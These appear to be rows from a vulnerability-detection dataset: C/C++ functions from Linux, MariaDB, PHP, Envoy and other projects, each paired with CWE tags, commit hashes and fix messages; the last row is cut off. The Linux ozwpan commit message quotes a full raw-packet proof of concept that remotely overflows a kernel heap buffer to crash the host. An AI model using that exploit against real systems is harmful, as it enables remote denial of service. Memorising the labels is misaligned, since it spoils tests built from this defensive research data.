perf: Treat attr.config as u64 in perf_swevent_init() Trinity discovered that we fail to check all 64 bits of attr.config passed by user space, resulting to out-of-bounds access of the perf_swevent_enabled array in sw_perf_event_destroy(). Introduced in commit b0a873ebb ("perf: Register PMU implementations"). Signed-off-by: Tommi Rantala <[email protected]> Cc: Peter Zijlstra <[email protected]> Cc: [email protected] Cc: Paul Mackerras <[email protected]> Cc: Arnaldo Carvalho de Melo <[email protected]> Link: http://lkml.kernel.org/r/[email protected] Signed-off-by: Ingo Molnar <[email protected]>
void setattr_copy(struct inode *inode, const struct iattr *attr) { unsigned int ia_valid = attr->ia_valid; if (ia_valid & ATTR_UID) inode->i_uid = attr->ia_uid; if (ia_valid & ATTR_GID) inode->i_gid = attr->ia_gid; if (ia_valid & ATTR_ATIME) inode->i_atime = timespec_trunc(attr->ia_atime, inode->i_sb->s_time_gran); if (ia_valid & ATTR_MTIME) inode->i_mtime = timespec_trunc(attr->ia_mtime, inode->i_sb->s_time_gran); if (ia_valid & ATTR_CTIME) inode->i_ctime = timespec_trunc(attr->ia_ctime, inode->i_sb->s_time_gran); if (ia_valid & ATTR_MODE) { umode_t mode = attr->ia_mode; if (!in_group_p(inode->i_gid) && !capable_wrt_inode_uidgid(inode, CAP_FSETID)) mode &= ~S_ISGID; inode->i_mode = mode; } }
0
[ "CWE-284", "CWE-264" ]
linux
23adbe12ef7d3d4195e80800ab36b37bee28cd03
3,535,170,711,390,075,000,000,000,000,000,000,000
26
fs,userns: Change inode_capable to capable_wrt_inode_uidgid The kernel has no concept of capabilities with respect to inodes; inodes exist independently of namespaces. For example, inode_capable(inode, CAP_LINUX_IMMUTABLE) would be nonsense. This patch changes inode_capable to check for uid and gid mappings and renames it to capable_wrt_inode_uidgid, which should make it more obvious what it does. Fixes CVE-2014-4014. Cc: Theodore Ts'o <[email protected]> Cc: Serge Hallyn <[email protected]> Cc: "Eric W. Biederman" <[email protected]> Cc: Dave Chinner <[email protected]> Cc: [email protected] Signed-off-by: Andy Lutomirski <[email protected]> Signed-off-by: Linus Torvalds <[email protected]>
int multi_update::do_updates() { TABLE_LIST *cur_table; int local_error= 0; ha_rows org_updated; TABLE *table, *tmp_table, *err_table; List_iterator_fast<TABLE> check_opt_it(unupdated_check_opt_tables); DBUG_ENTER("multi_update::do_updates"); do_update= 0; // Don't retry this function if (!found) DBUG_RETURN(0); /* Update read_set to include all fields that virtual columns may depend on. Usually they're already in the read_set, but if the previous access method was keyread, only the virtual column itself will be in read_set, not its dependencies */ while(TABLE *tbl= check_opt_it++) { if (tbl->vcol_set) { bitmap_clear_all(tbl->vcol_set); for (Field **vf= tbl->vfield; *vf; vf++) { if (bitmap_is_set(tbl->read_set, (*vf)->field_index)) tbl->mark_virtual_col(*vf); } } } for (cur_table= update_tables; cur_table; cur_table= cur_table->next_local) { bool can_compare_record; uint offset= cur_table->shared; table = cur_table->table; if (table == table_to_update) continue; // Already updated org_updated= updated; tmp_table= tmp_tables[cur_table->shared]; tmp_table->file->extra(HA_EXTRA_CACHE); // Change to read cache if (unlikely((local_error= table->file->ha_rnd_init(0)))) { err_table= table; goto err; } table->file->extra(HA_EXTRA_NO_CACHE); /* We have to clear the base record, if we have virtual indexed blob fields, as some storage engines will access the blob fields to calculate the keys to see if they have changed. Without clearing the blob pointers will contain random values which can cause a crash. This is a workaround for engines that access columns not present in either read or write set. */ if (table->vfield) empty_record(table); has_vers_fields= table->vers_check_update(*fields); check_opt_it.rewind(); while(TABLE *tbl= check_opt_it++) { if (unlikely((local_error= tbl->file->ha_rnd_init(0)))) { err_table= tbl; goto err; } tbl->file->extra(HA_EXTRA_CACHE); } /* Setup copy functions to copy fields from temporary table */ List_iterator_fast<Item> field_it(*fields_for_table[offset]); Field **field; Copy_field *copy_field_ptr= copy_field, *copy_field_end; /* Skip row pointers */ field= tmp_table->field + 1 + unupdated_check_opt_tables.elements; for ( ; *field ; field++) { Item_field *item= (Item_field* ) field_it++; (copy_field_ptr++)->set(item->field, *field, 0); } copy_field_end=copy_field_ptr; if (unlikely((local_error= tmp_table->file->ha_rnd_init(1)))) { err_table= tmp_table; goto err; } can_compare_record= records_are_comparable(table); for (;;) { if (thd->killed && trans_safe) { thd->fatal_error(); goto err2; } if (unlikely((local_error= tmp_table->file->ha_rnd_next(tmp_table->record[0])))) { if (local_error == HA_ERR_END_OF_FILE) break; err_table= tmp_table; goto err; } /* call rnd_pos() using rowids from temporary table */ check_opt_it.rewind(); TABLE *tbl= table; uint field_num= 0; do { DBUG_ASSERT(!tmp_table->field[field_num]->is_null()); if (unlikely((local_error= tbl->file->ha_rnd_pos(tbl->record[0], (uchar *) tmp_table-> field[field_num]->ptr)))) { err_table= tbl; goto err; } field_num++; } while ((tbl= check_opt_it++)); if (table->vfield && unlikely(table->update_virtual_fields(table->file, VCOL_UPDATE_INDEXED_FOR_UPDATE))) goto err2; table->status|= STATUS_UPDATED; store_record(table,record[1]); /* Copy data from temporary table to current table */ for (copy_field_ptr=copy_field; copy_field_ptr != copy_field_end; copy_field_ptr++) { (*copy_field_ptr->do_copy)(copy_field_ptr); copy_field_ptr->to_field->set_has_explicit_value(); } table->evaluate_update_default_function(); if (table->vfield && table->update_virtual_fields(table->file, VCOL_UPDATE_FOR_WRITE)) goto err2; if (table->triggers && table->triggers->process_triggers(thd, TRG_EVENT_UPDATE, TRG_ACTION_BEFORE, TRUE)) goto err2; if (!can_compare_record || compare_record(table)) { int error; if ((error= cur_table->view_check_option(thd, ignore)) != VIEW_CHECK_OK) { if (error == VIEW_CHECK_SKIP) continue; else if (unlikely(error == VIEW_CHECK_ERROR)) { thd->fatal_error(); goto err2; } } if (has_vers_fields && table->versioned()) table->vers_update_fields(); if (unlikely((local_error= table->file->ha_update_row(table->record[1], table->record[0]))) && local_error != HA_ERR_RECORD_IS_THE_SAME) { if (!ignore || table->file->is_fatal_error(local_error, HA_CHECK_ALL)) { err_table= table; goto err; } } if (local_error != HA_ERR_RECORD_IS_THE_SAME) { updated++; if (has_vers_fields && table->versioned()) { if (table->versioned(VERS_TIMESTAMP)) { store_record(table, record[2]); if ((local_error= vers_insert_history_row(table))) { restore_record(table, record[2]); err_table = table; goto err; } restore_record(table, record[2]); } updated_sys_ver++; } } else local_error= 0; } if (table->triggers && unlikely(table->triggers->process_triggers(thd, TRG_EVENT_UPDATE, TRG_ACTION_AFTER, TRUE))) goto err2; } if (updated != org_updated) { if (table->file->has_transactions()) transactional_tables= TRUE; else { trans_safe= FALSE; // Can't do safe rollback thd->transaction.stmt.modified_non_trans_table= TRUE; } } (void) table->file->ha_rnd_end(); (void) tmp_table->file->ha_rnd_end(); check_opt_it.rewind(); while (TABLE *tbl= check_opt_it++) tbl->file->ha_rnd_end(); } DBUG_RETURN(0); err: { prepare_record_for_error_message(local_error, err_table); err_table->file->print_error(local_error,MYF(ME_FATALERROR)); } err2: if (table->file->inited) (void) table->file->ha_rnd_end(); if (tmp_table->file->inited) (void) tmp_table->file->ha_rnd_end(); check_opt_it.rewind(); while (TABLE *tbl= check_opt_it++) { if (tbl->file->inited) (void) tbl->file->ha_rnd_end(); } if (updated != org_updated) { if (table->file->has_transactions()) transactional_tables= TRUE; else { trans_safe= FALSE; thd->transaction.stmt.modified_non_trans_table= TRUE; } } DBUG_RETURN(1); }
0
[ "CWE-617" ]
server
ecb6f9c894d3ebafeff1c6eb3b65cd248062296f
48,668,189,709,956,170,000,000,000,000,000,000,000
266
MDEV-28095 crash in multi-update and implicit grouping disallow implicit grouping in multi-update. explicit GROUP BY is not allowed by the grammar.
static void oz_plat_shutdown(struct platform_device *dev) { }
0
[ "CWE-703", "CWE-189" ]
linux
b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c
63,592,330,609,522,140,000,000,000,000,000,000,000
3
ozwpan: Use unsigned ints to prevent heap overflow Using signed integers, the subtraction between required_size and offset could wind up being negative, resulting in a memcpy into a heap buffer with a negative length, resulting in huge amounts of network-supplied data being copied into the heap, which could potentially lead to remote code execution.. This is remotely triggerable with a magic packet. A PoC which obtains DoS follows below. It requires the ozprotocol.h file from this module. =-=-=-=-=-= #include <arpa/inet.h> #include <linux/if_packet.h> #include <net/if.h> #include <netinet/ether.h> #include <stdio.h> #include <string.h> #include <stdlib.h> #include <endian.h> #include <sys/ioctl.h> #include <sys/socket.h> #define u8 uint8_t #define u16 uint16_t #define u32 uint32_t #define __packed __attribute__((__packed__)) #include "ozprotocol.h" static int hex2num(char c) { if (c >= '0' && c <= '9') return c - '0'; if (c >= 'a' && c <= 'f') return c - 'a' + 10; if (c >= 'A' && c <= 'F') return c - 'A' + 10; return -1; } static int hwaddr_aton(const char *txt, uint8_t *addr) { int i; for (i = 0; i < 6; i++) { int a, b; a = hex2num(*txt++); if (a < 0) return -1; b = hex2num(*txt++); if (b < 0) return -1; *addr++ = (a << 4) | b; if (i < 5 && *txt++ != ':') return -1; } return 0; } int main(int argc, char *argv[]) { if (argc < 3) { fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]); return 1; } uint8_t dest_mac[6]; if (hwaddr_aton(argv[2], dest_mac)) { fprintf(stderr, "Invalid mac address.\n"); return 1; } int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); if (sockfd < 0) { perror("socket"); return 1; } struct ifreq if_idx; int interface_index; strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1); if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) { perror("SIOCGIFINDEX"); return 1; } interface_index = if_idx.ifr_ifindex; if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) { perror("SIOCGIFHWADDR"); return 1; } uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_elt_connect_req oz_elt_connect_req; } __packed connect_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(0) }, .oz_elt = { .type = OZ_ELT_CONNECT_REQ, .length = sizeof(struct oz_elt_connect_req) }, .oz_elt_connect_req = { .mode = 0, .resv1 = {0}, .pd_info = 0, .session_id = 0, .presleep = 35, .ms_isoc_latency = 0, .host_vendor = 0, .keep_alive = 0, .apps = htole16((1 << OZ_APPID_USB) | 0x1), .max_len_div16 = 0, .ms_per_isoc = 0, .up_audio_buf = 0, .ms_per_elt = 0 } }; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_get_desc_rsp oz_get_desc_rsp; } __packed pwn_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(1) }, .oz_elt = { .type = OZ_ELT_APP_DATA, .length = sizeof(struct oz_get_desc_rsp) }, .oz_get_desc_rsp = { .app_id = OZ_APPID_USB, .elt_seq_num = 0, .type = OZ_GET_DESC_RSP, .req_id = 0, .offset = htole16(2), .total_size = htole16(1), .rcode = 0, .data = {0} } }; struct sockaddr_ll socket_address = { .sll_ifindex = interface_index, .sll_halen = ETH_ALEN, .sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }; if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } usleep(300000); if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } return 0; } Signed-off-by: Jason A. Donenfeld <[email protected]> Acked-by: Dan Carpenter <[email protected]> Cc: stable <[email protected]> Signed-off-by: Greg Kroah-Hartman <[email protected]>
static int ZEND_FASTCALL zend_fetch_var_address_helper_SPEC_CONST(int type, ZEND_OPCODE_HANDLER_ARGS) { zend_op *opline = EX(opline); zend_free_op free_op1; zval *varname = &opline->op1.u.constant; zval **retval; zval tmp_varname; HashTable *target_symbol_table; if (IS_CONST != IS_CONST && Z_TYPE_P(varname) != IS_STRING) { tmp_varname = *varname; zval_copy_ctor(&tmp_varname); convert_to_string(&tmp_varname); varname = &tmp_varname; } if (opline->op2.u.EA.type == ZEND_FETCH_STATIC_MEMBER) { retval = zend_std_get_static_property(EX_T(opline->op2.u.var).class_entry, Z_STRVAL_P(varname), Z_STRLEN_P(varname), 0 TSRMLS_CC); } else { target_symbol_table = zend_get_target_symbol_table(opline, EX(Ts), type, varname TSRMLS_CC); /* if (!target_symbol_table) { ZEND_VM_NEXT_OPCODE(); } */ if (zend_hash_find(target_symbol_table, varname->value.str.val, varname->value.str.len+1, (void **) &retval) == FAILURE) { switch (type) { case BP_VAR_R: case BP_VAR_UNSET: zend_error(E_NOTICE,"Undefined variable: %s", Z_STRVAL_P(varname)); /* break missing intentionally */ case BP_VAR_IS: retval = &EG(uninitialized_zval_ptr); break; case BP_VAR_RW: zend_error(E_NOTICE,"Undefined variable: %s", Z_STRVAL_P(varname)); /* break missing intentionally */ case BP_VAR_W: { zval *new_zval = &EG(uninitialized_zval); Z_ADDREF_P(new_zval); zend_hash_update(target_symbol_table, varname->value.str.val, varname->value.str.len+1, &new_zval, sizeof(zval *), (void **) &retval); } break; EMPTY_SWITCH_DEFAULT_CASE() } } switch (opline->op2.u.EA.type) { case ZEND_FETCH_GLOBAL: if (IS_CONST != IS_TMP_VAR) { } break; case ZEND_FETCH_LOCAL: break; case ZEND_FETCH_STATIC: zval_update_constant(retval, (void*) 1 TSRMLS_CC); break; case ZEND_FETCH_GLOBAL_LOCK: if (IS_CONST == IS_VAR && !free_op1.var) { PZVAL_LOCK(*EX_T(opline->op1.u.var).var.ptr_ptr); } break; } } if (IS_CONST != IS_CONST && varname == &tmp_varname) { zval_dtor(varname); } if (!RETURN_VALUE_UNUSED(&opline->result)) { if (opline->extended_value & ZEND_FETCH_MAKE_REF) { SEPARATE_ZVAL_TO_MAKE_IS_REF(retval); } PZVAL_LOCK(*retval); switch (type) { case BP_VAR_R: case BP_VAR_IS: AI_SET_PTR(EX_T(opline->result.u.var).var, *retval); break; case BP_VAR_UNSET: { zend_free_op free_res; EX_T(opline->result.u.var).var.ptr_ptr = retval; PZVAL_UNLOCK(*EX_T(opline->result.u.var).var.ptr_ptr, &free_res); if (EX_T(opline->result.u.var).var.ptr_ptr != &EG(uninitialized_zval_ptr)) { SEPARATE_ZVAL_IF_NOT_REF(EX_T(opline->result.u.var).var.ptr_ptr); } PZVAL_LOCK(*EX_T(opline->result.u.var).var.ptr_ptr); FREE_OP_VAR_PTR(free_res); break; default: EX_T(opline->result.u.var).var.ptr_ptr = retval; break; } } } ZEND_VM_NEXT_OPCODE(); }
0
[]
php-src
ce96fd6b0761d98353761bf78d5bfb55291179fd
293,516,145,490,800,830,000,000,000,000,000,000,000
101
- fix #39863, do not accept paths with NULL in them. See http://news.php.net/php.internals/50191, trunk will have the patch later (adding a macro and/or changing (some) APIs. Patch by Rasmus
file_list_cancel (NautilusDirectory *directory) { directory_load_cancel (directory); if (directory->details->dequeue_pending_idle_id != 0) { g_source_remove (directory->details->dequeue_pending_idle_id); directory->details->dequeue_pending_idle_id = 0; } if (directory->details->pending_file_info != NULL) { eel_g_object_list_free (directory->details->pending_file_info); directory->details->pending_file_info = NULL; } if (directory->details->hidden_file_hash) { g_hash_table_foreach_remove (directory->details->hidden_file_hash, remove_callback, NULL); } }
0
[]
nautilus
7632a3e13874a2c5e8988428ca913620a25df983
93,162,714,150,591,850,000,000,000,000,000,000,000
18
Check for trusted desktop file launchers. 2009-02-24 Alexander Larsson <[email protected]> * libnautilus-private/nautilus-directory-async.c: Check for trusted desktop file launchers. * libnautilus-private/nautilus-file-private.h: * libnautilus-private/nautilus-file.c: * libnautilus-private/nautilus-file.h: Add nautilus_file_is_trusted_link. Allow unsetting of custom display name. * libnautilus-private/nautilus-mime-actions.c: Display dialog when trying to launch a non-trusted desktop file. svn path=/trunk/; revision=15003
StreamInfoImpl( Http::Protocol protocol, TimeSource& time_source, const Network::ConnectionInfoProviderSharedPtr& downstream_connection_info_provider, FilterStateSharedPtr parent_filter_state, FilterState::LifeSpan life_span) : StreamInfoImpl( protocol, time_source, downstream_connection_info_provider, std::make_shared<FilterStateImpl>( FilterStateImpl::LazyCreateAncestor(std::move(parent_filter_state), life_span), FilterState::LifeSpan::FilterChain)) {}
0
[ "CWE-416" ]
envoy
fe7c69c248f4fe5a9080c7ccb35275b5218bb5ab
294,117,978,201,771,100,000,000,000,000,000,000,000
9
internal redirect: fix a lifetime bug (#785) Signed-off-by: Alyssa Wilk <[email protected]> Signed-off-by: Matt Klein <[email protected]> Signed-off-by: Pradeep Rao <[email protected]>
copy_msg(struct regional* region, struct lruhash_entry* e, struct query_info** k, struct reply_info** d) { struct reply_info* rep = (struct reply_info*)e->data; if(rep->rrset_count > RR_COUNT_MAX) return 0; /* to protect against integer overflow */ *d = (struct reply_info*)regional_alloc_init(region, e->data, sizeof(struct reply_info) + sizeof(struct rrset_ref) * (rep->rrset_count-1) + sizeof(struct ub_packed_rrset_key*) * rep->rrset_count); if(!*d) return 0; (*d)->rrsets = (struct ub_packed_rrset_key**)(void *)( (uint8_t*)(&((*d)->ref[0])) + sizeof(struct rrset_ref) * rep->rrset_count); *k = (struct query_info*)regional_alloc_init(region, e->key, sizeof(struct query_info)); if(!*k) return 0; (*k)->qname = regional_alloc_init(region, (*k)->qname, (*k)->qname_len); return (*k)->qname != NULL; }
0
[ "CWE-613", "CWE-703" ]
unbound
f6753a0f1018133df552347a199e0362fc1dac68
142,674,918,584,038,600,000,000,000,000,000,000,000
23
- Fix the novel ghost domain issues CVE-2022-30698 and CVE-2022-30699.
ieee80211_sched_scan_start(struct wiphy *wiphy, struct net_device *dev, struct cfg80211_sched_scan_request *req) { struct ieee80211_sub_if_data *sdata = IEEE80211_DEV_TO_SUB_IF(dev); if (!sdata->local->ops->sched_scan_start) return -EOPNOTSUPP; return ieee80211_request_sched_scan_start(sdata, req); }
0
[ "CWE-287" ]
linux
3e493173b7841259a08c5c8e5cbe90adb349da7e
273,770,752,746,339,280,000,000,000,000,000,000,000
11
mac80211: Do not send Layer 2 Update frame before authorization The Layer 2 Update frame is used to update bridges when a station roams to another AP even if that STA does not transmit any frames after the reassociation. This behavior was described in IEEE Std 802.11F-2003 as something that would happen based on MLME-ASSOCIATE.indication, i.e., before completing 4-way handshake. However, this IEEE trial-use recommended practice document was published before RSN (IEEE Std 802.11i-2004) and as such, did not consider RSN use cases. Furthermore, IEEE Std 802.11F-2003 was withdrawn in 2006 and as such, has not been maintained amd should not be used anymore. Sending out the Layer 2 Update frame immediately after association is fine for open networks (and also when using SAE, FT protocol, or FILS authentication when the station is actually authenticated by the time association completes). However, it is not appropriate for cases where RSN is used with PSK or EAP authentication since the station is actually fully authenticated only once the 4-way handshake completes after authentication and attackers might be able to use the unauthenticated triggering of Layer 2 Update frame transmission to disrupt bridge behavior. Fix this by postponing transmission of the Layer 2 Update frame from station entry addition to the point when the station entry is marked authorized. Similarly, send out the VLAN binding update only if the STA entry has already been authorized. Signed-off-by: Jouni Malinen <[email protected]> Reviewed-by: Johannes Berg <[email protected]> Signed-off-by: David S. Miller <[email protected]>
Status KernelAndDeviceOp::Init(const Context& ctx, const NodeDef& ndef, GraphCollector* graph_collector) { OpKernel* k = nullptr; if (flr_ == nullptr) { return errors::Internal( "A valid FunctionLibraryRuntime must be provided when running ops " "based on OpKernel."); } std::shared_ptr<const NodeProperties> props; TF_RETURN_IF_ERROR(NodeProperties::CreateFromNodeDef( ndef, flr_->GetFunctionLibraryDefinition(), &props)); TF_RETURN_IF_ERROR(flr_->CreateKernel(props, &k)); kernel_.reset(k); input_alloc_attrs_.resize(kernel_->num_inputs()); input_devices_.resize(kernel_->num_inputs(), device_); for (size_t i = 0; i < input_alloc_attrs_.size(); ++i) { bool host = kernel_->input_memory_types()[i] == tensorflow::HOST_MEMORY; input_alloc_attrs_[i].set_on_host(host); if (host) { input_devices_[i] = host_cpu_device_; } } output_alloc_attrs_.resize(kernel_->num_outputs()); for (size_t i = 0; i < output_alloc_attrs_.size(); ++i) { output_alloc_attrs_[i].set_on_host(kernel_->output_memory_types()[i] == tensorflow::HOST_MEMORY); } return Status::OK(); }
0
[ "CWE-476", "CWE-369" ]
tensorflow
da8558533d925694483d2c136a9220d6d49d843c
129,103,471,789,584,780,000,000,000,000,000,000,000
31
Fix undefined behavior in `tf.raw_ops.Switch` in eager mode. PiperOrigin-RevId: 332578058 Change-Id: I9727571d2f21476b10d8aa27c1b7176564b76ac9
void HeaderMapImpl::HeaderEntryImpl::value(const HeaderEntry& header) { value(header.value().getStringView()); }
0
[ "CWE-400", "CWE-703" ]
envoy
afc39bea36fd436e54262f150c009e8d72db5014
85,936,018,631,232,030,000,000,000,000,000,000,000
3
Track byteSize of HeaderMap internally. Introduces a cached byte size updated internally in HeaderMap. The value is stored as an optional, and is cleared whenever a non-const pointer or reference to a HeaderEntry is accessed. The cached value can be set with refreshByteSize() which performs an iteration over the HeaderMap to sum the size of each key and value in the HeaderMap. Signed-off-by: Asra Ali <[email protected]>
static bool mtrr_is_enabled(struct kvm_mtrr *mtrr_state) { return !!(mtrr_state->deftype & IA32_MTRR_DEF_TYPE_E); }
0
[ "CWE-284" ]
linux
9842df62004f366b9fed2423e24df10542ee0dc5
161,608,701,687,464,980,000,000,000,000,000,000,000
4
KVM: MTRR: remove MSR 0x2f8 MSR 0x2f8 accessed the 124th Variable Range MTRR ever since MTRR support was introduced by 9ba075a664df ("KVM: MTRR support"). 0x2f8 became harmful when 910a6aae4e2e ("KVM: MTRR: exactly define the size of variable MTRRs") shrinked the array of VR MTRRs from 256 to 8, which made access to index 124 out of bounds. The surrounding code only WARNs in this situation, thus the guest gained a limited read/write access to struct kvm_arch_vcpu. 0x2f8 is not a valid VR MTRR MSR, because KVM has/advertises only 16 VR MTRR MSRs, 0x200-0x20f. Every VR MTRR is set up using two MSRs, 0x2f8 was treated as a PHYSBASE and 0x2f9 would be its PHYSMASK, but 0x2f9 was not implemented in KVM, therefore 0x2f8 could never do anything useful and getting rid of it is safe. This fixes CVE-2016-3713. Fixes: 910a6aae4e2e ("KVM: MTRR: exactly define the size of variable MTRRs") Cc: [email protected] Reported-by: David Matlack <[email protected]> Signed-off-by: Andy Honig <[email protected]> Signed-off-by: Radim Krčmář <[email protected]> Signed-off-by: Paolo Bonzini <[email protected]>
inline void process_header() { handler_->handle_header(); }
0
[ "CWE-416" ]
Crow
fba01dc76d6ea940ad7c8392e8f39f9647241d8e
132,797,139,447,303,500,000,000,000,000,000,000,000
4
Prevent HTTP pipelining which Crow doesn't support.
rsvg_parse_style_pair (RsvgHandle * ctx, RsvgState * state, const gchar * name, const gchar * value, gboolean important) { StyleValueData *data; data = g_hash_table_lookup (state->styles, name); if (data && data->important && !important) return; if (name == NULL || value == NULL) return; g_hash_table_insert (state->styles, (gpointer) g_strdup (name), (gpointer) style_value_data_new (value, important)); if (g_str_equal (name, "color")) state->current_color = rsvg_css_parse_color (value, &state->has_current_color); else if (g_str_equal (name, "opacity")) state->opacity = rsvg_css_parse_opacity (value); else if (g_str_equal (name, "flood-color")) state->flood_color = rsvg_css_parse_color (value, &state->has_flood_color); else if (g_str_equal (name, "flood-opacity")) { state->flood_opacity = rsvg_css_parse_opacity (value); state->has_flood_opacity = TRUE; } else if (g_str_equal (name, "filter")) state->filter = rsvg_filter_parse (ctx->priv->defs, value); else if (g_str_equal (name, "a:adobe-blending-mode")) { if (g_str_equal (value, "normal")) state->adobe_blend = 0; else if (g_str_equal (value, "multiply")) state->adobe_blend = 1; else if (g_str_equal (value, "screen")) state->adobe_blend = 2; else if (g_str_equal (value, "darken")) state->adobe_blend = 3; else if (g_str_equal (value, "lighten")) state->adobe_blend = 4; else if (g_str_equal (value, "softlight")) state->adobe_blend = 5; else if (g_str_equal (value, "hardlight")) state->adobe_blend = 6; else if (g_str_equal (value, "colordodge")) state->adobe_blend = 7; else if (g_str_equal (value, "colorburn")) state->adobe_blend = 8; else if (g_str_equal (value, "overlay")) state->adobe_blend = 9; else if (g_str_equal (value, "exclusion")) state->adobe_blend = 10; else if (g_str_equal (value, "difference")) state->adobe_blend = 11; else state->adobe_blend = 0; } else if (g_str_equal (name, "mask")) state->mask = rsvg_mask_parse (ctx->priv->defs, value); else if (g_str_equal (name, "clip-path")) { state->clip_path_ref = rsvg_clip_path_parse (ctx->priv->defs, value); } else if (g_str_equal (name, "overflow")) { if (!g_str_equal (value, "inherit")) { state->overflow = rsvg_css_parse_overflow (value, &state->has_overflow); } } else if (g_str_equal (name, "enable-background")) { if (g_str_equal (value, "new")) state->enable_background = RSVG_ENABLE_BACKGROUND_NEW; else state->enable_background = RSVG_ENABLE_BACKGROUND_ACCUMULATE; } else if (g_str_equal (name, "comp-op")) { if (g_str_equal (value, "clear")) state->comp_op = CAIRO_OPERATOR_CLEAR; else if (g_str_equal (value, "src")) state->comp_op = CAIRO_OPERATOR_SOURCE; else if (g_str_equal (value, "dst")) state->comp_op = CAIRO_OPERATOR_DEST; else if (g_str_equal (value, "src-over")) state->comp_op = CAIRO_OPERATOR_OVER; else if (g_str_equal (value, "dst-over")) state->comp_op = CAIRO_OPERATOR_DEST_OVER; else if (g_str_equal (value, "src-in")) state->comp_op = CAIRO_OPERATOR_IN; else if (g_str_equal (value, "dst-in")) state->comp_op = CAIRO_OPERATOR_DEST_IN; else if (g_str_equal (value, "src-out")) state->comp_op = CAIRO_OPERATOR_OUT; else if (g_str_equal (value, "dst-out")) state->comp_op = CAIRO_OPERATOR_DEST_OUT; else if (g_str_equal (value, "src-atop")) state->comp_op = CAIRO_OPERATOR_ATOP; else if (g_str_equal (value, "dst-atop")) state->comp_op = CAIRO_OPERATOR_DEST_ATOP; else if (g_str_equal (value, "xor")) state->comp_op = CAIRO_OPERATOR_XOR; else if (g_str_equal (value, "plus")) state->comp_op = CAIRO_OPERATOR_ADD; else if (g_str_equal (value, "multiply")) state->comp_op = CAIRO_OPERATOR_MULTIPLY; else if (g_str_equal (value, "screen")) state->comp_op = CAIRO_OPERATOR_SCREEN; else if (g_str_equal (value, "overlay")) state->comp_op = CAIRO_OPERATOR_OVERLAY; else if (g_str_equal (value, "darken")) state->comp_op = CAIRO_OPERATOR_DARKEN; else if (g_str_equal (value, "lighten")) state->comp_op = CAIRO_OPERATOR_LIGHTEN; else if (g_str_equal (value, "color-dodge")) state->comp_op = CAIRO_OPERATOR_COLOR_DODGE; else if (g_str_equal (value, "color-burn")) state->comp_op = CAIRO_OPERATOR_COLOR_BURN; else if (g_str_equal (value, "hard-light")) state->comp_op = CAIRO_OPERATOR_HARD_LIGHT; else if (g_str_equal (value, "soft-light")) state->comp_op = CAIRO_OPERATOR_SOFT_LIGHT; else if (g_str_equal (value, "difference")) state->comp_op = CAIRO_OPERATOR_DIFFERENCE; else if (g_str_equal (value, "exclusion")) state->comp_op = CAIRO_OPERATOR_EXCLUSION; else state->comp_op = CAIRO_OPERATOR_OVER; } else if (g_str_equal (name, "display")) { state->has_visible = TRUE; if (g_str_equal (value, "none")) state->visible = FALSE; else if (!g_str_equal (value, "inherit") != 0) state->visible = TRUE; else state->has_visible = FALSE; } else if (g_str_equal (name, "xml:space")) { state->has_space_preserve = TRUE; if (g_str_equal (value, "default")) state->space_preserve = FALSE; else if (!g_str_equal (value, "preserve") == 0) state->space_preserve = TRUE; else state->space_preserve = FALSE; } else if (g_str_equal (name, "visibility")) { state->has_visible = TRUE; if (g_str_equal (value, "visible")) state->visible = TRUE; else if (!g_str_equal (value, "inherit") != 0) state->visible = FALSE; /* collapse or hidden */ else state->has_visible = FALSE; } else if (g_str_equal (name, "fill")) { RsvgPaintServer *fill = state->fill; state->fill = rsvg_paint_server_parse (&state->has_fill_server, ctx->priv->defs, value, 0); rsvg_paint_server_unref (fill); } else if (g_str_equal (name, "fill-opacity")) { state->fill_opacity = rsvg_css_parse_opacity (value); state->has_fill_opacity = TRUE; } else if (g_str_equal (name, "fill-rule")) { state->has_fill_rule = TRUE; if (g_str_equal (value, "nonzero")) state->fill_rule = CAIRO_FILL_RULE_WINDING; else if (g_str_equal (value, "evenodd")) state->fill_rule = CAIRO_FILL_RULE_EVEN_ODD; else state->has_fill_rule = FALSE; } else if (g_str_equal (name, "clip-rule")) { state->has_clip_rule = TRUE; if (g_str_equal (value, "nonzero")) state->clip_rule = CAIRO_FILL_RULE_WINDING; else if (g_str_equal (value, "evenodd")) state->clip_rule = CAIRO_FILL_RULE_EVEN_ODD; else state->has_clip_rule = FALSE; } else if (g_str_equal (name, "stroke")) { RsvgPaintServer *stroke = state->stroke; state->stroke = rsvg_paint_server_parse (&state->has_stroke_server, ctx->priv->defs, value, 0); rsvg_paint_server_unref (stroke); } else if (g_str_equal (name, "stroke-width")) { state->stroke_width = _rsvg_css_parse_length (value); state->has_stroke_width = TRUE; } else if (g_str_equal (name, "stroke-linecap")) { state->has_cap = TRUE; if (g_str_equal (value, "butt")) state->cap = 